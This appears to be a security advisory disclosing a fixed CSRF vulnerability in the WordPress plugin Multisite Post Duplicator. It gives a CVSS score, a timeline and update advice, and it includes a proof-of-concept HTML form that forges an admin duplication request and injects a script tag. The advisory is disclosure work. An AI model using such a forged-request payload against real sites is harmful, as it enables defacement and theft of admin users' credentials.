CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do


Last revised:

Contains a CSRF vulnerability which can copy content from one site of a multisite installation to another.

This could be used to add arbitrary HTML to the front-end of the site (which could be used for defacement, harvesting login credentials from authenticated users, or could be used to do virtually anything a logged-in admin user can do).

This could also be used to view content not meant to be published.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Some of these values may need adjusting depending on the post IDs, blog IDs, etc.

<form method="POST" action="http://localhost/wp-admin/tools.php?page=mpd">
  <input type="text" name="mpd-post-status" value="draft">
  <input type="text" name="mdp-prefix" value="&lt;script&gt;alert(1)&lt;/script&gt;">
  <input type="text" name="action" value="add_foobar">
  <input type="text" name="el0" value="post">
  <input type="text" name="el1" value="1">
  <input type="text" name="el2" value="1">
  <input type="text" name="el3" value="1">
  <input type="text" name="duplicate-submit" value="Duplicate">
  <input type="submit">

Advisory timeline

  • 2016-11-01: Discovered
  • 2016-12-07: Tested version 1.1.3 and found the plugin no longer vulnerable to the attack as described
  • 2016-12-09: Advisory published

Mitigation/further actions

Update to version 1.1.3 or later.